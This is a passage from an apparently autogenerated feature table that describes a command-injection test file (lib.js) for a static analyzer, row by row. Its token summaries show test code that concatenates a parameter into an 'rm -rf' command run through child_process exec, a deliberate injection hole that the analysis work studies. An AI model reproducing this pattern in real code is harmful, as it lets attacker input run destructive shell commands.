name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:4 | cp | contextSurroundingFunctionParameters | (cmd) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:4 | cp | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:4 | cp | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:9 | cp.exec | contextSurroundingFunctionParameters | (cmd) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:9 | cp.exec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:9 | cp.exec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | cp.exec(cmd) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | cp.exec(cmd) | contextSurroundingFunctionParameters | (cmd) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | cp.exec(cmd) | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | cp.exec(cmd) | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | cp.exec(cmd) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | exceptional return of cp.exec(cmd) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | exceptional return of cp.exec(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | exceptional return of cp.exec(cmd) | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | exceptional return of cp.exec(cmd) | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | exceptional return of cp.exec(cmd) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:6:59:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:6:59:9 | exec | contextSurroundingFunctionParameters | (cmd) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:6:59:9 | exec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:6:59:9 | exec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:6:59:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | contextSurroundingFunctionParameters | (cmd) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:11:59:13 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:7 | myExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:7 | myExec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:7 | myExec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:7 | myExec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:7 | myExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | exceptional return of myExec(cmd2) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | exceptional return of myExec(cmd2) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | exceptional return of myExec(cmd2) | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | exceptional return of myExec(cmd2) | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | exceptional return of myExec(cmd2) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | myExec(cmd2) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | myExec(cmd2) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | myExec(cmd2) | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | myExec(cmd2) | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:2:61:13 | myExec(cmd2) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:9:61:12 | cmd2 | CalleeFlexibleAccessPath | myExec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:9:61:12 | cmd2 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:9:61:12 | cmd2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:9:61:12 | cmd2 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:9:61:12 | cmd2 | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:9:61:12 | cmd2 | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:61:9:61:12 | cmd2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:27 | module. ... gConcat | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:27 | module. ... gConcat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:64:27 | module. ... gConcat | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:80:1 | module. ... . \\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:80:1 | module. ... . \\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:1:80:1 | module. ... . \\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:8:64:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:8:64:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:8:64:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:16:64:27 | stringConcat | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 